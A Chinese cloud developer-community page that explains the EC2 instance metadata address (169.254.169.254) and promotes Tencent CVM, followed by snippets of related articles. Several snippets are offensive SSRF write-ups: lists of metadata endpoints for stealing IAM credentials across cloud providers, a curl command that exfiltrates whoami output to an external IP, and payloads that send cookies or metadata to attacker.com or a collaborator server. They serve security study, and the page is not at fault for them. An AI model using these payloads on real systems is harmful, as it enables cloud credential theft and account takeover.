开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

元数据调用- http://169.254.169.254/latest/meta-data/ EC2 -uri

元数据调用是指通过特定的URI地址获取云计算实例的元数据信息。在云计算中，元数据是指描述云实例的属性和配置信息的数据。通过元数据调用，用户可以获取到实例的各种信息，如实例ID、实例类型、操作系统、网络配置、安全组等。

元数据调用的URI地址是"http://169.254.169.254/latest/meta-data/"，用户可以通过该地址发送HTTP请求来获取元数据信息。其中，"/latest/meta-data/"是固定的路径，用于指定获取元数据的类型。

EC2是Amazon Web Services（AWS）提供的一种云计算服务，它是一种弹性计算云服务，可以提供可调整规模的计算能力。在元数据调用中，EC2是指云实例的一种类型。用户可以通过元数据调用获取EC2实例的各种信息，如实例ID、实例类型、操作系统、网络配置等。

腾讯云提供了一系列与云计算相关的产品，其中包括与元数据调用相关的产品。推荐的腾讯云产品是云服务器（CVM），它是腾讯云提供的一种弹性计算服务，类似于AWS的EC2。用户可以通过云服务器获取实例的元数据信息。具体的产品介绍和相关链接地址可以参考腾讯云的官方文档：https://cloud.tencent.com/product/cvm

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

SSRF 从入门到批量找漏洞

云实例 Amazon: 如果你在 Amazon 中找到 SSRF，则 Amazon 会公开每个 EC2 实例的内部服务，可以查询主机实例的元数据。...当你发现在 EC2 上存在 SSRF 漏洞，可尝试如下请求： http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest.../user-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE http:...consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2...consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2

3.8K2 0

蓝军技巧之SSRF利用方法

0x01 Cloud Metadata 就是各种云上的元数据信息，有些可直接拿到主机权限，有些可获取一些敏感信息。...http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy http://169.254.169.254/latest.../latest/meta-data/iam/security-credentials/[ROLE NAME] http://169.254.169.254/latest/meta-data/public-keys.../help/faq-detail/49122.htm http://100.100.100.200/latest/meta-data/ http://100.100.100.200/latest/meta-data...://metadata.tencentyun.com/latest/meta-data/ http://169.254.0.23/latest/meta-data/ http://100.88.222.5

2K3 0

KubeVirt macvtap虚拟机创建过程手动实验

init Unable to find image 'fanux/libvirt:latest' locally latest: Pulling from fanux/libvirt ac9208207ada...://169.254.169.254/2009-04-04/meta-data/instance-id'] after 126 seconds[ 438.700606] cloud-init[2214...: ec2: #############################################################ec2: -----BEGIN SSH HOST KEY FINGERPRINTS...----- ec2: 256 SHA256:+/5XwLw4GlltaTay0VpF47EwPhaOO6uzUTPPhHJI2oQ no comment (ECDSA)ec2: 256 SHA256:chny9bN6XCMj8F5Fxq7.../s7Q no comment (RSA)ec2: -----END SSH HOST KEY FINGERPRINTS----- ec2: ##############################

1.6K1 0

使用SSRF泄漏云环境中的Metadata数据实现RCE

正如我们所知，[169.254.169.254]是EC2实例的本地IP地址。让我们尝试通过导航到[ latest/meta-data/]来访问元数据文件夹。 ? SSRF被确认。...让我们通过导航到[/latest/meta-data/iam/security-credentials/]来检查我们当前的角色。...抓取所需数据 1）转到[/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/] 获取[AccessKeyId...comment “whoami” –parameters commands=’curl 128.199.xx.xx:8080/`whoami`’ –output text –region=region 但显示调用...aws-elasticbeanstalk-ec2-role/i-007xxxxxxxxxxxxxx is not authorized to perform: ssm:SendCommand on resource: arn:aws:ec2

2.4K3 0

云的声音｜浅谈云上攻防之——元数据服务带来的安全挑战

以AWS举例，可以在实例内部访问如下地址来查看所有类别的实例元数据： http://169.254.169.254/latest/meta-data/ 169.254.169.254属于链路本地地址（Link-localaddress...url=http://169.254.169.254/latest/meta-data/iam/info 在获取到角色名称后，攻击者可以继续通过SSRF漏洞获取角色的临时凭证： http://x.x.x.x.../url=http://169.254.169.254/latest/metadata/iam/security-credentials/ 获取角色临时凭据的案例可参见下图: ?...完整流程如下： TOKEN=`curl-X PUT "http://169.254.169.254/latest/api/token" -H"X-aws-ec2-metadata-token-ttl-seconds...: 21600" curlhttp://169.254.169.254/latest/meta-data/profile -H“X-aws-ec2-metadata-token: $TOKEN” 流程图如下

1.2K2 0

一文拿下SSRF攻击利用及绕过保护机制

它有一项名为“实例源数据”的服务。这让EC2实例能够访问返回关于实例本身的数据API(在地址169.254.169.254上)。...如果一家公司在Amazon EC2上托管其基础架构，攻击者可以使用以下端点查询有关该主机的各种实例源数据： http://169.254.169.254/latest/meta-data/ 这些端点会泄露...： http://169.254.169.254/latest/meta-data/ returnsthe list of available metadata that you can query....http://169.254.169.254/latest/meta-data/local-hostname/ returnsthe internal hostname used by the host.... http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME returnsthe security credentials

4.8K3 0

将SSRF升级为RCE

所以我们知道[169.254.169.254]是EC2实例的本地IP地址。让我们尝试通过导航到[/latest/meta-data/]来访问meta-data文件夹。 SSRF确认。...在EC2环境上冲浪：让我们检查我们当前的角色通过导航到 [/latest/meta -data/iam/security -credentials/]....抓取需要的数据： 1.进入[/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/] 获取[AccessKeyId...~# aws s3 ls 调用ListBuckets操作时发生错误（AccessDenied）。...为了访问S3 bucket，我们将使用之前抓取的数据，格式如下： elasticbeanstalk-region-account-id.

1.9K4 0

云上攻防-云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

前言元数据解释：实例元数据（metadata）包含了弹性计算云服务器实例在阿里云系统中的信息，您可以在运行中的实例内方便地查看实例元数据，并基于实例元数据配置或管理实例。...各大云元数据地址：阿里云元数据地址：http://100.100.100.200/ 腾讯云元数据地址：http://metadata.tencentyun.com/ 华为云元数据地址：http:...//169.254.169.254/ 亚马云元数据地址：http://169.254.169.254/ 微软云元数据地址：http://169.254.169.254/ 谷歌云元数据地址：http:...://100.100.100.200/latest/meta-data/ curl http://100.100.100.200/latest/meta-data/ram/security-credentials.../ -获取临时凭证 curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs 此时这个临时凭证的权限就是RAM用户创建时的被授予的权限

1241 0

在本地KVM中安装使用Cloud-init

metadata service提供一个可以获取数据的url，例如OpenStack中的nova-api-metadat提供的http://169.254.169.254，虚拟机开机后cloud-init...文件结构一般如下： openstack/ - 2012-08-10/ or latest/ - meta_data.json - user_data (not mandatory...) - content/ - 0000 (referenced content files) - 0001 - .... ec2 - latest/... - meta-data.json (not mandatory) Nocloud 这种模式与config drive类似，只是文件结构不同，一般由user-data和meta-data两个文本文件构成...ls /mnt meta-data user-data cat user-data #cloud-config chpasswd: list: | root:123456 expire: false ssh_pwauth

1.6K1 0

16-cloud-init

://169.254.169.254/2009-04-04/meta-data/instance-id' failed [114/120s]: request error [HTTPConnectionPool...(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (...://169.254.169.254/2009-04-04/meta-data/instance-id结果都访问失败神奇的169.254.169.254 169.254.169.254 是个什么地址？...流程总结云主机访问169.254.169.254时，数据包走到网关(自己所在dhcp命名空间)，然后neutron-ns-metadata-proxy 将请求通过 unix domain socket...访问169.254.169.254目录内容类似 [root@servera ~]# mount /dev/sr0 /media/ [root@servera ~]# ls /media/ ec2 openstack

2.8K3 0

Server Side XSS (Dynamic PDF)

='http://attacker.com/?...c='+ document.cookie"> new Image().src="http://attacker.com/?...在这个SVG有效负载中可以使用以下任何先前的有效负载，以一个iframe访问burpcollaborator子域和另一个iframe访问元数据端点为例 Bot delay <!

5512 0

分布式系统开发实战：实战，使用AWS平台实现Serverless架构

玩家统一通过HTTP(S)登录中心站点并获取状态信息。 ·对战初始，由中心站点对玩家进行重定向到对应的Game Server。在对战过程中，使用TCP长连接从而保证更好的游戏体验。...·对战结束后，客户端与Game Server中断TCP连接，对战结果数据回滚到中心站点并保存最终的状态信息。...如下所示，我们的中心站点（即Lambda部署的站点）选择的是Virginia（弗吉尼亚，美国东部地区），通过Node.js SDK跨地区到Tokyo（东京，日本首都）来启动EC2服务器。...aws-sdk'); exports.handler = function (event, context) { console.log("Received data as:", event); var ec2.../bin/bash #get instance-id from local meta-data id=$(curl -s http://169.254.169.254/ latest/meta-data

1.8K1 0

Botb：容器分析和漏洞利用工具

即http://169.254.169.254 通过暴露的Docker Daemon执行容器突破通过CVE-2019-5736执行容器突破使用自定义payload劫持主机二进制文件以CI/CD模式执行操作...，仅返回> 0退出代码从GCP元数据端点中抓取元数据信息将数据推送到s3 bucket 突破特权容器强制BOtB始终返回Exit代码0（对非阻塞CI/CD有用）从CLI参数或从YAML配置文件执行以上操作...0 扫描元数据端点默认情况下，BOtB扫描两个元数据端点。 # ....://169.254.169.254/latest/meta-data/' [*] Attempting to query metadata endpoint: 'http://kubernetes.default.svc...Valid HTTP Socket: /var/run/docker.sock [+] Finished 从 GCP 元数据实例中抓取数据 # .

1.3K1 0

云实例初始化的行业标准：Cloud-Init

Cloud-Init 将在启动时识别其运行所在的云环境，读取来自云端提供的任何元数据，并据此初始化系统。这可能涉及设置网络和存储设备，配置 SSH 访问密钥以及系统的许多其他方面。...在云上（以 AWS 为例）如果不使用 k8s 部署，AutoMQ 将会使用 ASG 和 EC2 来运行。AutoMQ 启动前涉及一系列初始化任务和配置才可以完整正常的启动。...://169.254.169.254/latest/meta-data/placement/region) aws configure set default.region ${region_id...://169.254.169.254/latest/meta-data/instance-id) - | echo "AUTOMQ_ENABLE_LOCAL_CONFIG=#{AUTOMQ_ENABLE_LOCAL_CONFIG...这些数据指示 Cloud-Init 要执行的操作，可能包括实例的元数据（如机器 ID、主机名和网络配置）、供应商数据和用户数据（userdata）。

1641 0

浅谈云上攻防——Web应用托管服务中的元数据安全隐患

Web应用托管服务作为一种云上服务，其中也会应用到的元数据服务进行实例元数据查询，因此不得不考虑元数据服务安全对Web应用托管服务安全性的影响。...Web应用托管服务中同样存在着元数据服务带来的安全挑战，本文将扩展探讨元数据服务与Web应用托管服务这一组合存在的安全隐患。...Web应用托管服务中的元数据安全隐患在Web应用托管服务中的元数据安全隐患章节中，我们将以AWS 下的Elastic Beanstalk服务进行举例，以此介绍一下攻击者如何攻击Web应用托管服务并利用元数据服务获取信息发起后续攻击...url=http://169.254.169.254/latest/dynamic/instance-identity/document 从响应数据中Accountid、Region字段获取account-id...url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ AWS-elasticbeanstalk-EC2-role 从响应数据中获取

3.8K2 0

「云网络安全」为AWS S3和Yum执行Squid访问策略

169.254.169.254是Amazon EC2元数据服务。我们排除了这一点，因为我们希望实例直接命中元数据服务。...如果我们代理这些请求，元数据服务将返回关于代理实例的信息，而不是发出请求的实例的信息此时代理将允许访问任何URL。为了确保一切正常工作，Alice使用curl加载www.google.com。...$ curl -I http://repo.us-east-1.amazonaws.com/latest/main/mirror.list HTTP/1.1 200 OK 最后，Alice对Yum进行了测试...://169.254.169.254/latest/meta-data/local-ipv4/)" } ] } } ] } EOF aws route53...该脚本使用Amazon EC2元数据服务来发现它正在运行的实例的IP地址。然后它调用Amazon Route 53 API来更新DNS条目。

3K2 0

SVG SSRF 绕过

由于该应用程序大量处理数据分析，该应用程序具有将研究数据显示为饼图、图形、表格等的功能。还可以使用数据准备报告并与共同研究人员共享。这些饼图、报告和图形可以导出为 DOCX、PDF 和 PNG。...现在我需要一种方法来泄露数据。...="20" width="20" onload="fetch(' http://169.254.169.254/latest/meta-data/hostname ').then(函数（响应）{response.text...使用 Fetch API，我们请求 AWS 元数据。我们将元数据响应存储在“params”参数中。然后服务器向 burp 协作服务器发出 POST 请求，元数据作为 POST 正文。...下面分享payload ## 旁路-3 客户应用更多的输出编码。

1.4K2 0

对印度某电子商务公司从LFI到数据库获取的渗透测试过程

://169.254.169.254/latest/dynamic/instance-identity/document”的系统服务API中，还可获取到一些AWS账号ID和云服务区域信息，如下：在我检查系统的...AWS Elastic Beanstalk部署环境时，还发现了一个API调用，用它可以获取到AWS Access Key、Secret Access Key和Token等重要的验证信息，这个API是：...http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role 直接用上述的...SSRF方式，加上这个API调用，在响应信息中就能返回AWS Access Key、Secret Access Key和Token，结合之前发现的账户ID，现在的情况是越来越严重了：接下来，我们可以来验证一下这些...AWS账户了，只要密码不过期，就可以在aws-cli命令行界面中来进行操作了，如下：也可以列出相关信息或下载S3 bucket数据到本地系统中，如下：获取数据库当细细查看S3 bucket数据时，

1.5K5 0

Cloud RedTeam视角下元数据服务攻防实践

aws地址： http://169.254.169.254/latest/meta-data/ Google Cloud地址： http://metadata/computeMetadata/v1/ Azure...地址： http://169.254.169.254/metadata/instance?...api-version=2017-04-02 Oracle Cloud地址： http://169.254.169.254/opc/v1/instance/ 这个地址的学名叫做链路本地地址，链路本地地址又称连结本地位址...这就导致一个问题，攻击者拿到的这个角色，恰恰是Capital One银行的应用程序，用来调用他在亚马逊云上的对象存储的角色。...url=http://169.254.169.254/latest/meta-data/iam/info 网站上它存在一个SSRF漏洞，并且有回显，它存在url参数，后面我们构造一个payload来访问这个元数据服务

1.6K3 0

干货 | 容器成本降低50%，携程在AWS Spot上的实践

2）实例元数据（Metadata）服务：通过在实例内 curl http://169.254.169.254/latest/meta-data/spot/instance-action 可以查看该事件相关信息...出于安全的考虑，调用K8s apiserver所需要的如认证等信息存储在Parameter Store上，给Lambda赋具有AmazonSSMReadOnlyAccess权限的IAM角色，调用K8s...我们采用CloudWatch Events而非检测实例元数据服务的方式，一方面原因在于开销少，无需在机器上部署，包括对应日志收集的程序; 更重要的原因在于考虑到对实例回收事件引发的故障的排障需求。...若使用实例元数据服务，极有可能丢失事件现场的日志：实例元数据未能准确送入到元数据服务上、实例上程序异常退出、实例网络问题、日志链路不可用等。...Lambda通过EC2 API获取该实例的详细信息，存入到存储系统。基于数据，可以制作监控的告警看板，以及进行后续的治理分析。

2.2K4 1

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭